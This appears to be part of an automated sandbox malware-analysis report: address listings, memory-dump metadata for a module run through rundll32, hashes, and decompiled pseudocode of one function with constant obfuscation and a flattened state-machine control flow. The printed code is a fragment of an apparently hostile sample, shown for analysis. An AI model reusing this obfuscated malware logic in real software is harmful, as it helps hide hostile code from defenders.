                                                                                                                      0x00186b43
                                                                                                                      0x00186b4b
                                                                                                                      0x00186b53
                                                                                                                      0x00186b5e
                                                                                                                      0x00186b69
                                                                                                                      0x00186b74
                                                                                                                      0x00186b7c
                                                                                                                      0x00186b84
                                                                                                                      0x00186b8c
                                                                                                                      0x00186b94
                                                                                                                      0x00186b9f
                                                                                                                      0x00186baa
                                                                                                                      0x00186bb5
                                                                                                                      0x00186bbd
                                                                                                                      0x00186bc5
                                                                                                                      0x00186bcd
                                                                                                                      0x00186bd5
                                                                                                                      0x00186bdd
                                                                                                                      0x00186be5
                                                                                                                      0x00186bea
                                                                                                                      0x00186bf2
                                                                                                                      0x00186bfa
                                                                                                                      0x00186c02
                                                                                                                      0x00186c0d
                                                                                                                      0x00186c18
                                                                                                                      0x00186c23
                                                                                                                      0x00186c2b
                                                                                                                      0x00186c33
                                                                                                                      0x00186c40
                                                                                                                      0x00186c44
                                                                                                                      0x00186c4c
                                                                                                                      0x00186c57
                                                                                                                      0x00186c62
                                                                                                                      0x00186c6a
                                                                                                                      0x00186c75
                                                                                                                      0x00186c7d
                                                                                                                      0x00186c82
                                                                                                                      0x00186c87
                                                                                                                      0x00186c8f
                                                                                                                      0x00186c97
                                                                                                                      0x00186c9f
                                                                                                                      0x00186ca7
                                                                                                                      0x00186caf
                                                                                                                      0x00186cb4
                                                                                                                      0x00186cbc
                                                                                                                      0x00186cc7
                                                                                                                      0x00186cd4
                                                                                                                      0x00186cdf
                                                                                                                      0x00186cea
                                                                                                                      0x00186cf9
                                                                                                                      0x00186cfc
                                                                                                                      0x00186d00
                                                                                                                      0x00186d08
                                                                                                                      0x00186d10
                                                                                                                      0x00186d24
                                                                                                                      0x00186d25
                                                                                                                      0x00186d2e
                                                                                                                      0x00186d39
                                                                                                                      0x00186d49
                                                                                                                      0x00186d4f
                                                                                                                      0x00186d57
                                                                                                                      0x00186d5f
                                                                                                                      0x00186d6a
                                                                                                                      0x00186d75
                                                                                                                      0x00186d80
                                                                                                                      0x00186d8b
                                                                                                                      0x00186d96
                                                                                                                      0x00186d9e
                                                                                                                      0x00186da9
                                                                                                                      0x00186db1
                                                                                                                      0x00186db9
                                                                                                                      0x00186dc1
                                                                                                                      0x00186dc9
                                                                                                                      0x00186dd4
                                                                                                                      0x00186ddc
                                                                                                                      0x00186de7
                                                                                                                      0x00186df2
                                                                                                                      0x00186e04
                                                                                                                      0x00186e09
                                                                                                                      0x00186e12
                                                                                                                      0x00186e1d
                                                                                                                      0x00186e30
                                                                                                                      0x00186e33
                                                                                                                      0x00186e3a
                                                                                                                      0x00186e45
                                                                                                                      0x00186e59
                                                                                                                      0x00186e5a
                                                                                                                      0x00186e6d
                                                                                                                      0x00186e74
                                                                                                                      0x00186e7f
                                                                                                                      0x00186e8a
                                                                                                                      0x00186e95
                                                                                                                      0x00186e9d
                                                                                                                      0x00186ea8
                                                                                                                      0x00186eb3
                                                                                                                      0x00186ec7
                                                                                                                      0x00186ec8
                                                                                                                      0x00186ecf
                                                                                                                      0x00186eda
                                                                                                                      0x00186ee5
                                                                                                                      0x00186efa
                                                                                                                      0x00186f03
                                                                                                                      0x00186f0e
                                                                                                                      0x00186f19
                                                                                                                      0x00186f24
                                                                                                                      0x00186f2f
                                                                                                                      0x00186f3a
                                                                                                                      0x00186f45
                                                                                                                      0x00186f4d
                                                                                                                      0x00186f58
                                                                                                                      0x00186f63
                                                                                                                      0x00186f6e
                                                                                                                      0x00186f79
                                                                                                                      0x00186f84
                                                                                                                      0x00186f8f
                                                                                                                      0x00186f97
                                                                                                                      0x00186fa2
                                                                                                                      0x00186faa
                                                                                                                      0x00186fb2
                                                                                                                      0x00186fb7
                                                                                                                      0x00186fbc
                                                                                                                      0x00186fc4
                                                                                                                      0x00186fd0
                                                                                                                      0x00186fd5
                                                                                                                      0x00186fdb
                                                                                                                      0x00186fe0
                                                                                                                      0x00186fe8
                                                                                                                      0x00186ff0
                                                                                                                      0x00186ffb
                                                                                                                      0x00187006
                                                                                                                      0x00187011
                                                                                                                      0x00187019
                                                                                                                      0x00187021
                                                                                                                      0x00187029
                                                                                                                      0x0018702e
                                                                                                                      0x00187034
                                                                                                                      0x0018703c
                                                                                                                      0x00187047
                                                                                                                      0x00187052
                                                                                                                      0x0018705d
                                                                                                                      0x00187065
                                                                                                                      0x0018706d
                                                                                                                      0x00187075
                                                                                                                      0x0018707d
                                                                                                                      0x00187085
                                                                                                                      0x00187097
                                                                                                                      0x001870a1
                                                                                                                      0x001870a8
                                                                                                                      0x001870af
                                                                                                                      0x001870b6
                                                                                                                      0x001870c1
                                                                                                                      0x001870cc
                                                                                                                      0x001870d7
                                                                                                                      0x001870df
                                                                                                                      0x001870ea
                                                                                                                      0x001870f5
                                                                                                                      0x001870f5
                                                                                                                      0x001870f9
                                                                                                                      0x001870f9
                                                                                                                      0x001870fe
                                                                                                                      0x001870fe
                                                                                                                      0x001870fe
                                                                                                                      0x001870fe
                                                                                                                      0x00187104
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001872d3
                                                                                                                      0x001872d9
                                                                                                                      0x00187418
                                                                                                                      0x00187419
                                                                                                                      0x0018741a
                                                                                                                      0x0018741f
                                                                                                                      0x00187425
                                                                                                                      0x00187427
                                                                                                                      0x00187433
                                                                                                                      0x00187437
                                                                                                                      0x0018743c
                                                                                                                      0x00000000
                                                                                                                      0x0018743c
                                                                                                                      0x00187429
                                                                                                                      0x001871d4
                                                                                                                      0x001871d4
                                                                                                                      0x001870f9
                                                                                                                      0x00000000
                                                                                                                      0x001870f9
                                                                                                                      0x001872df
                                                                                                                      0x001872e5
                                                                                                                      0x00187390
                                                                                                                      0x001873a7
                                                                                                                      0x001873a9
                                                                                                                      0x001873af
                                                                                                                      0x001873b1
                                                                                                                      0x001873b3
                                                                                                                      0x001873b5
                                                                                                                      0x001873be
                                                                                                                      0x001873be
                                                                                                                      0x001873c0
                                                                                                                      0x001873c2
                                                                                                                      0x001873c4

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^Z$'xUx$(q$)E1$)w@$-R$:|$>,b$\,j$\f%$izV$`a$x
                                                                                                                      • API String ID: 0-215870970
                                                                                                                      • Opcode ID: 4224ef0704ab9c8449df674c2c021625508c4f488bb0a3d84cb0878dbe0b21b3
                                                                                                                      • Instruction ID: ff36fef6a4e5891f1e0f225a47615c9c6cc6569228bb82b7319b0eb6773b0737
                                                                                                                      • Opcode Fuzzy Hash: 4224ef0704ab9c8449df674c2c021625508c4f488bb0a3d84cb0878dbe0b21b3
                                                                                                                      • Instruction Fuzzy Hash: 315220725083819FD378DF25C98AB8BBBE1BBD4318F10891DE5DA96260D7B08949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00172FA1(void* __ecx) {
                                                                                                                      				char _v524;
                                                                                                                      				char _v1044;
                                                                                                                      				char _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				intOrPtr _v1572;
                                                                                                                      				intOrPtr _v1576;
                                                                                                                      				intOrPtr _v1588;
                                                                                                                      				char _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				signed int _v1764;
                                                                                                                      				signed int _v1768;
                                                                                                                      				signed int _v1772;
                                                                                                                      				signed int _v1776;
                                                                                                                      				signed int _v1780;
                                                                                                                      				signed int _v1784;
                                                                                                                      				signed int _v1788;
                                                                                                                      				signed int _v1792;
                                                                                                                      				signed int _v1796;
                                                                                                                      				signed int _v1800;
                                                                                                                      				signed int _v1804;
                                                                                                                      				signed int _v1808;
                                                                                                                      				signed int _v1812;
                                                                                                                      				signed int _v1816;
                                                                                                                      				signed int _v1820;
                                                                                                                      				signed int _v1824;
                                                                                                                      				signed int _v1828;
                                                                                                                      				signed int _v1832;
                                                                                                                      				void* _t602;
                                                                                                                      				void* _t605;
                                                                                                                      				void* _t612;
                                                                                                                      				void* _t615;
                                                                                                                      				void* _t627;
                                                                                                                      				void* _t629;
                                                                                                                      				signed int _t631;
                                                                                                                      				signed int _t632;
                                                                                                                      				signed int _t633;
                                                                                                                      				signed int _t634;
                                                                                                                      				signed int _t635;
                                                                                                                      				signed int _t636;
                                                                                                                      				signed int _t637;
                                                                                                                      				signed int _t638;
                                                                                                                      				signed int _t639;
                                                                                                                      				signed int _t640;
                                                                                                                      				signed int _t641;
                                                                                                                      				signed int _t642;
                                                                                                                      				signed int _t643;
                                                                                                                      				signed int _t644;
                                                                                                                      				signed int _t645;
                                                                                                                      				signed int _t646;
                                                                                                                      				void* _t647;
                                                                                                                      				signed int _t650;
                                                                                                                      				signed int _t696;
                                                                                                                      				signed int _t706;
                                                                                                                      				void* _t708;
                                                                                                                      				void* _t713;
                                                                                                                      				void* _t714;
                                                                                                                      
                                                                                                                      				_v1568 = _v1568 & 0x00000000;
                                                                                                                      				_v1596 = _v1596 & 0x00000000;
                                                                                                                      				_v1576 = 0x5e97ec;
                                                                                                                      				_v1572 = 0x72e58f;
                                                                                                                      				_v1768 = 0x70cb3c;
                                                                                                                      				_v1768 = _v1768 + 0xffffc098;
                                                                                                                      				_v1768 = _v1768 >> 0xd;
                                                                                                                      				_v1768 = _v1768 ^ 0x02000384;
                                                                                                                      				_v1820 = 0xee4d2b;
                                                                                                                      				_t15 =  &_v1820; // 0xee4d2b
                                                                                                                      				_t629 = __ecx;
                                                                                                                      				_t708 = 0x23fa72;
                                                                                                                      				_t631 = 0x3b;
                                                                                                                      				_v1820 =  *_t15 / _t631;
                                                                                                                      				_t632 = 0x76;
                                                                                                                      				_v1820 = _v1820 * 0x22;
                                                                                                                      				_v1820 = _v1820 + 0xffff6a70;
                                                                                                                      				_v1820 = _v1820 ^ 0x0087d8ad;
                                                                                                                      				_v1744 = 0x47ad5e;
                                                                                                                      				_v1744 = _v1744 + 0xffff8cd4;
                                                                                                                      				_v1744 = _v1744 * 0x70;
                                                                                                                      				_v1744 = _v1744 ^ 0x1f2feb3a;
                                                                                                                      				_v1628 = 0xf34c5;
                                                                                                                      				_v1628 = _v1628 + 0x5841;
                                                                                                                      				_v1628 = _v1628 ^ 0x0009a1de;
                                                                                                                      				_v1812 = 0x9823b5;
                                                                                                                      				_v1812 = _v1812 ^ 0xd7f45b6c;
                                                                                                                      				_v1812 = _v1812 / _t632;
                                                                                                                      				_v1812 = _v1812 ^ 0x01df5c7b;
                                                                                                                      				_v1812 = _v1812 ^ 0x000f259a;
                                                                                                                      				_v1608 = 0x734624;
                                                                                                                      				_v1608 = _v1608 >> 0xe;
                                                                                                                      				_v1608 = _v1608 ^ 0x000c01bf;
                                                                                                                      				_v1804 = 0xceac9b;
                                                                                                                      				_v1804 = _v1804 << 0x10;
                                                                                                                      				_t633 = 0x3d;
                                                                                                                      				_v1804 = _v1804 / _t633;
                                                                                                                      				_v1804 = _v1804 + 0x655b;
                                                                                                                      				_v1804 = _v1804 ^ 0x02dbc44e;
                                                                                                                      				_v1736 = 0x9be166;
                                                                                                                      				_v1736 = _v1736 >> 5;
                                                                                                                      				_v1736 = _v1736 ^ 0xd09875ee;
                                                                                                                      				_v1736 = _v1736 ^ 0xd0950b72;
                                                                                                                      				_v1824 = 0xc35391;
                                                                                                                      				_v1824 = _v1824 >> 3;
                                                                                                                      				_v1824 = _v1824 >> 0x10;
                                                                                                                      				_v1824 = _v1824 * 3;
                                                                                                                      				_v1824 = _v1824 ^ 0x00036b47;
                                                                                                                      				_v1800 = 0x15c07f;
                                                                                                                      				_v1800 = _v1800 << 9;
                                                                                                                      				_v1800 = _v1800 >> 4;
                                                                                                                      				_v1800 = _v1800 | 0x1ec023ab;
                                                                                                                      				_v1800 = _v1800 ^ 0x1effac55;
                                                                                                                      				_v1668 = 0x9ff678;
                                                                                                                      				_v1668 = _v1668 >> 6;
                                                                                                                      				_v1668 = _v1668 ^ 0x00061642;
                                                                                                                      				_v1676 = 0x388031;
                                                                                                                      				_v1676 = _v1676 + 0xa9e3;
                                                                                                                      				_v1676 = _v1676 ^ 0x003372a3;
                                                                                                                      				_v1700 = 0x68320b;
                                                                                                                      				_v1700 = _v1700 >> 9;
                                                                                                                      				_v1700 = _v1700 * 0x58;
                                                                                                                      				_v1700 = _v1700 ^ 0x00127519;
                                                                                                                      				_v1728 = 0x8bcc69;
                                                                                                                      				_v1728 = _v1728 + 0xffffee5b;
                                                                                                                      				_v1728 = _v1728 >> 0xf;
                                                                                                                      				_v1728 = _v1728 ^ 0x000f8317;
                                                                                                                      				_v1620 = 0xdd5dd2;
                                                                                                                      				_v1620 = _v1620 + 0xffff3cca;
                                                                                                                      				_v1620 = _v1620 ^ 0x00d1dad8;
                                                                                                                      				_v1756 = 0x5b77fe;
                                                                                                                      				_v1756 = _v1756 >> 0x10;
                                                                                                                      				_v1756 = _v1756 + 0xcf07;
                                                                                                                      				_v1756 = _v1756 ^ 0x0002651f;
                                                                                                                      				_v1600 = 0xe5338f;
                                                                                                                      				_v1600 = _v1600 >> 2;
                                                                                                                      				_v1600 = _v1600 ^ 0x0038d695;
                                                                                                                      				_v1748 = 0x539c61;
                                                                                                                      				_v1748 = _v1748 >> 4;
                                                                                                                      				_v1748 = _v1748 ^ 0x7ee23abc;
                                                                                                                      				_v1748 = _v1748 ^ 0x7eed6078;
                                                                                                                      				_v1660 = 0x8a8a87;
                                                                                                                      				_v1660 = _v1660 + 0xb3eb;
                                                                                                                      				_v1660 = _v1660 ^ 0x0081b7ad;
                                                                                                                      				_v1716 = 0x7622c2;
                                                                                                                      				_v1716 = _v1716 ^ 0x68bb0f30;
                                                                                                                      				_v1716 = _v1716 ^ 0x34de6465;
                                                                                                                      				_v1716 = _v1716 ^ 0x5c136dbb;
                                                                                                                      				_v1684 = 0xf6dfed;
                                                                                                                      				_v1684 = _v1684 << 0xb;
                                                                                                                      				_v1684 = _v1684 | 0x3f4bdd8f;
                                                                                                                      				_v1684 = _v1684 ^ 0xbff0253f;
                                                                                                                      				_v1816 = 0xe04e35;
                                                                                                                      				_v1816 = _v1816 >> 2;
                                                                                                                      				_v1816 = _v1816 + 0x327b;
                                                                                                                      				_v1816 = _v1816 + 0x911b;
                                                                                                                      				_v1816 = _v1816 ^ 0x003e79db;
                                                                                                                      				_v1612 = 0xd6f31e;
                                                                                                                      				_v1612 = _v1612 | 0x3022205e;
                                                                                                                      				_v1612 = _v1612 ^ 0x30f4c89e;
                                                                                                                      				_v1784 = 0xaf77e7;
                                                                                                                      				_t634 = 0x4a;
                                                                                                                      				_v1784 = _v1784 / _t634;
                                                                                                                      				_v1784 = _v1784 | 0x421bf711;
                                                                                                                      				_t635 = 0x50;
                                                                                                                      				_v1784 = _v1784 * 0x54;
                                                                                                                      				_v1784 = _v1784 ^ 0xb12f1f5b;
                                                                                                                      				_v1652 = 0xf84d37;
                                                                                                                      				_v1652 = _v1652 * 0x24;
                                                                                                                      				_v1652 = _v1652 ^ 0x22e540eb;
                                                                                                                      				_v1792 = 0xffdc51;
                                                                                                                      				_v1792 = _v1792 << 0xa;
                                                                                                                      				_v1792 = _v1792 | 0xe1b7830e;
                                                                                                                      				_v1792 = _v1792 + 0xffff0b40;
                                                                                                                      				_v1792 = _v1792 ^ 0xfffcd716;
                                                                                                                      				_v1740 = 0x197a11;
                                                                                                                      				_v1740 = _v1740 << 5;
                                                                                                                      				_v1740 = _v1740 / _t635;
                                                                                                                      				_v1740 = _v1740 ^ 0x00038a69;
                                                                                                                      				_v1644 = 0x6b00f0;
                                                                                                                      				_v1644 = _v1644 << 0xa;
                                                                                                                      				_v1644 = _v1644 ^ 0xac018c07;
                                                                                                                      				_v1604 = 0x611781;
                                                                                                                      				_v1604 = _v1604 << 0xf;
                                                                                                                      				_v1604 = _v1604 ^ 0x8bc919f5;
                                                                                                                      				_v1808 = 0xd36465;
                                                                                                                      				_t636 = 6;
                                                                                                                      				_v1808 = _v1808 * 0x36;
                                                                                                                      				_v1808 = _v1808 / _t636;
                                                                                                                      				_v1808 = _v1808 << 1;
                                                                                                                      				_v1808 = _v1808 ^ 0x0edf69e5;
                                                                                                                      				_v1832 = 0x3f9dc0;
                                                                                                                      				_v1832 = _v1832 + 0xffff18c0;
                                                                                                                      				_v1832 = _v1832 ^ 0x4a717db2;
                                                                                                                      				_v1832 = _v1832 << 8;
                                                                                                                      				_v1832 = _v1832 ^ 0x4fcf9c5e;
                                                                                                                      				_v1732 = 0x9e099a;
                                                                                                                      				_v1732 = _v1732 ^ 0xff857814;
                                                                                                                      				_v1732 = _v1732 + 0xffffca1f;
                                                                                                                      				_v1732 = _v1732 ^ 0xff111531;
                                                                                                                      				_v1776 = 0x4db87;
                                                                                                                      				_v1776 = _v1776 + 0xffff62f5;
                                                                                                                      				_v1776 = _v1776 ^ 0x44009895;
                                                                                                                      				_v1776 = _v1776 << 2;
                                                                                                                      				_v1776 = _v1776 ^ 0x101849e4;
                                                                                                                      				_v1708 = 0xd244cf;
                                                                                                                      				_v1708 = _v1708 >> 9;
                                                                                                                      				_t637 = 0x3a;
                                                                                                                      				_v1708 = _v1708 * 0x11;
                                                                                                                      				_v1708 = _v1708 ^ 0x000db4cc;
                                                                                                                      				_v1636 = 0xf59e87;
                                                                                                                      				_v1636 = _v1636 + 0xffff8d09;
                                                                                                                      				_v1636 = _v1636 ^ 0x00f1a368;
                                                                                                                      				_v1724 = 0x2bdcc8;
                                                                                                                      				_v1724 = _v1724 * 0x51;
                                                                                                                      				_v1724 = _v1724 * 0x5d;
                                                                                                                      				_v1724 = _v1724 ^ 0x0aa2c27a;
                                                                                                                      				_v1828 = 0x689116;
                                                                                                                      				_v1828 = _v1828 + 0xfffffd09;
                                                                                                                      				_v1828 = _v1828 / _t637;
                                                                                                                      				_t638 = 0x67;
                                                                                                                      				_v1828 = _v1828 / _t638;
                                                                                                                      				_v1828 = _v1828 ^ 0x000cd418;
                                                                                                                      				_v1692 = 0xa047a9;
                                                                                                                      				_v1692 = _v1692 << 6;
                                                                                                                      				_v1692 = _v1692 >> 3;
                                                                                                                      				_v1692 = _v1692 ^ 0x0505fbf3;
                                                                                                                      				_v1616 = 0xb6eb58;
                                                                                                                      				_v1616 = _v1616 ^ 0x8fb73430;
                                                                                                                      				_v1616 = _v1616 ^ 0x8f037651;
                                                                                                                      				_v1752 = 0x713cbb;
                                                                                                                      				_t639 = 0x59;
                                                                                                                      				_v1752 = _v1752 / _t639;
                                                                                                                      				_v1752 = _v1752 | 0x24e66ff7;
                                                                                                                      				_v1752 = _v1752 ^ 0x24e68565;
                                                                                                                      				_v1760 = 0x2ce68a;
                                                                                                                      				_v1760 = _v1760 + 0xf472;
                                                                                                                      				_v1760 = _v1760 >> 6;
                                                                                                                      				_v1760 = _v1760 ^ 0x000e4d4e;
                                                                                                                      				_v1764 = 0xb3dbfb;
                                                                                                                      				_v1764 = _v1764 * 0x44;
                                                                                                                      				_v1764 = _v1764 ^ 0x846d2ad4;
                                                                                                                      				_v1764 = _v1764 ^ 0xaba28cf9;
                                                                                                                      				_v1632 = 0xed14fe;
                                                                                                                      				_v1632 = _v1632 + 0x899;
                                                                                                                      				_v1632 = _v1632 ^ 0x00e7b355;
                                                                                                                      				_v1640 = 0x173d8;
                                                                                                                      				_v1640 = _v1640 | 0x072f8d22;
                                                                                                                      				_v1640 = _v1640 ^ 0x0725dc6d;
                                                                                                                      				_v1704 = 0xb743b;
                                                                                                                      				_v1704 = _v1704 * 0x22;
                                                                                                                      				_v1704 = _v1704 ^ 0x7ac75999;
                                                                                                                      				_v1704 = _v1704 ^ 0x7b4b4761;
                                                                                                                      				_v1648 = 0x376518;
                                                                                                                      				_t640 = 0x2b;
                                                                                                                      				_v1648 = _v1648 / _t640;
                                                                                                                      				_v1648 = _v1648 ^ 0x0009ae4a;
                                                                                                                      				_v1656 = 0x799ab2;
                                                                                                                      				_v1656 = _v1656 >> 5;
                                                                                                                      				_v1656 = _v1656 ^ 0x00024b68;
                                                                                                                      				_v1688 = 0x532d8e;
                                                                                                                      				_v1688 = _v1688 + 0xeacd;
                                                                                                                      				_t641 = 0x1f;
                                                                                                                      				_v1688 = _v1688 / _t641;
                                                                                                                      				_v1688 = _v1688 ^ 0x000bfc86;
                                                                                                                      				_v1696 = 0x1a47c3;
                                                                                                                      				_t642 = 0x35;
                                                                                                                      				_v1696 = _v1696 * 0x3c;
                                                                                                                      				_v1696 = _v1696 * 0x79;
                                                                                                                      				_v1696 = _v1696 ^ 0xe948599c;
                                                                                                                      				_v1788 = 0x31ddc5;
                                                                                                                      				_v1788 = _v1788 / _t642;
                                                                                                                      				_v1788 = _v1788 | 0x1a71d74c;
                                                                                                                      				_v1788 = _v1788 ^ 0xb8e3b14c;
                                                                                                                      				_v1788 = _v1788 ^ 0xa29596cb;
                                                                                                                      				_v1796 = 0xb7daa1;
                                                                                                                      				_v1796 = _v1796 + 0xffff2907;
                                                                                                                      				_v1796 = _v1796 >> 1;
                                                                                                                      				_t643 = 0x19;
                                                                                                                      				_v1796 = _v1796 * 0x38;
                                                                                                                      				_v1796 = _v1796 ^ 0x140afc74;
                                                                                                                      				_v1680 = 0x68ee60;
                                                                                                                      				_t407 =  &_v1680; // 0x68ee60
                                                                                                                      				_v1680 =  *_t407 / _t643;
                                                                                                                      				_t413 =  &_v1680; // 0x68ee60
                                                                                                                      				_t644 = 0x4b;
                                                                                                                      				_v1680 =  *_t413 / _t644;
                                                                                                                      				_v1680 = _v1680 ^ 0x000d0b0c;
                                                                                                                      				_v1624 = 0x50062a;
                                                                                                                      				_v1624 = _v1624 + 0xffffe4c0;
                                                                                                                      				_v1624 = _v1624 ^ 0x004144d3;
                                                                                                                      				_v1772 = 0x8d0174;
                                                                                                                      				_v1772 = _v1772 | 0x883a70ab;
                                                                                                                      				_t645 = 0x7c;
                                                                                                                      				_v1772 = _v1772 / _t645;
                                                                                                                      				_v1772 = _v1772 + 0x6c34;
                                                                                                                      				_v1772 = _v1772 ^ 0x01154615;
                                                                                                                      				_v1780 = 0x3c67da;
                                                                                                                      				_v1780 = _v1780 ^ 0x3b09705b;
                                                                                                                      				_t646 = 0x39;
                                                                                                                      				_v1780 = _v1780 / _t646;
                                                                                                                      				_v1780 = _v1780 | 0x19d7c010;
                                                                                                                      				_v1780 = _v1780 ^ 0x19d74af7;
                                                                                                                      				_v1664 = 0x6ef7ab;
                                                                                                                      				_v1664 = _v1664 >> 0x10;
                                                                                                                      				_v1664 = _v1664 ^ 0x00064358;
                                                                                                                      				_v1712 = 0x6e7286;
                                                                                                                      				_v1712 = _v1712 << 3;
                                                                                                                      				_v1712 = _v1712 + 0xffff7147;
                                                                                                                      				_v1712 = _v1712 ^ 0x03763b5e;
                                                                                                                      				_v1720 = 0x51f33b;
                                                                                                                      				_v1720 = _v1720 * 0x24;
                                                                                                                      				_v1720 = _v1720 | 0x382a3589;
                                                                                                                      				_v1720 = _v1720 ^ 0x3ba3189b;
                                                                                                                      				_v1672 = 0xa7c9a6;
                                                                                                                      				_v1672 = _v1672 | 0x6235af6b;
                                                                                                                      				_v1672 = _v1672 ^ 0x62b8a2b2;
                                                                                                                      				_t706 = _v1596;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t602 = 0x4d28763;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t647 = 0x87702da;
                                                                                                                      						L3:
                                                                                                                      						while(_t708 != 0x23fa72) {
                                                                                                                      							if(_t708 == 0x2649e52) {
                                                                                                                      								_push(_v1656);
                                                                                                                      								_push(_v1648);
                                                                                                                      								_push(_v1704);
                                                                                                                      								_push( &_v1564);
                                                                                                                      								_push( &_v1592);
                                                                                                                      								_push(_v1640);
                                                                                                                      								_push(_t647);
                                                                                                                      								_push(0);
                                                                                                                      								_t605 = E00179700(0, _v1632, __eflags);
                                                                                                                      								_t714 = _t713 + 0x20;
                                                                                                                      								__eflags = _t605;
                                                                                                                      								if(_t605 == 0) {
                                                                                                                      									L27:
                                                                                                                      									return _t605;
                                                                                                                      								}
                                                                                                                      								E00184DAD(_v1688, _v1696, _v1592, _v1788, _v1796);
                                                                                                                      								_t713 = _t714 + 0xc;
                                                                                                                      								_push(_v1780);
                                                                                                                      								_push(_v1772);
                                                                                                                      								_t696 = _v1624;
                                                                                                                      								_push(_v1588);
                                                                                                                      								_t650 = _v1680;
                                                                                                                      								L26:
                                                                                                                      								return E00184DAD(_t650, _t696);
                                                                                                                      							}
                                                                                                                      							if(_t708 == 0x3216d22) {
                                                                                                                      								_push(_v1672);
                                                                                                                      								_push(_v1720);
                                                                                                                      								_t696 = _v1712;
                                                                                                                      								_push(_v1596);
                                                                                                                      								_t650 = _v1664;
                                                                                                                      								goto L26;
                                                                                                                      							}
                                                                                                                      							if(_t708 == 0x6088cb4) {
                                                                                                                      								__eflags = _t706 - _t602;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t708 = 0xd3ee486;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								_push(_t647);
                                                                                                                      								_t605 = E0017B41A(_v1608, _v1768,  &_v1596, _v1804, _v1736);
                                                                                                                      								_t713 = _t713 + 0x14;
                                                                                                                      								__eflags = _t605;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									goto L27;
                                                                                                                      								}
                                                                                                                      								_t708 = 0xd3ee486;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t602 = 0x4d28763;
                                                                                                                      									L2:
                                                                                                                      									_t647 = 0x87702da;
                                                                                                                      									goto L3;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							if(_t708 == 0x7bff6cd) {
                                                                                                                      								_t612 = E0017B186();
                                                                                                                      								__eflags = _t612 - E00179685(_t647);
                                                                                                                      								_t602 = 0x4d28763;
                                                                                                                      								_t708 = 0x6088cb4;
                                                                                                                      								_t706 =  !=  ? 0x4d28763 : 0x58d295;
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      							if(_t708 == _t647) {
                                                                                                                      								_push(_v1596);
                                                                                                                      								_t615 = E0018363D( &_v1564, _v1832, _v1732, _v1776, _v1708,  &_v1592, _t647);
                                                                                                                      								_t713 = _t713 + 0x1c;
                                                                                                                      								__eflags = _t615;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									E00184DAD(_v1636, _v1724, _v1592, _v1828, _v1692);
                                                                                                                      									E00184DAD(_v1616, _v1752, _v1588, _v1760, _v1764);
                                                                                                                      									_t713 = _t713 + 0x18;
                                                                                                                      								}
                                                                                                                      								L11:
                                                                                                                      								_t708 = 0x3216d22;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							_t727 = _t708 - 0xd3ee486;
                                                                                                                      							if(_t708 != 0xd3ee486) {
                                                                                                                      								L21:
                                                                                                                      								__eflags = _t708 - 0x61b4f51;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								return _t602;
                                                                                                                      							}
                                                                                                                      							E001912A8(_t647, _v1824, _t727, _v1800, _v1668,  &_v1044);
                                                                                                                      							 *((short*)(E00184FA8(_v1676,  &_v1044, _v1700, _v1728))) = 0;
                                                                                                                      							E00178650(_v1620,  &_v524, _t727, _v1756);
                                                                                                                      							_push(_v1716);
                                                                                                                      							_push(_v1660);
                                                                                                                      							_push(0x17183c);
                                                                                                                      							E0017E7CE(E0017AB66(_v1600, _v1748, _t727), _t727, _v1684,  &_v1044, _v1600, _v1816, _v1612, _v1784, _v1652,  &_v524);
                                                                                                                      							E0017AE03(_v1792, _v1740, _v1644, _t622);
                                                                                                                      							_t627 = E0018C38F(_v1604,  &_v1564, _t629, _v1808);
                                                                                                                      							_t713 = _t713 + 0x54;
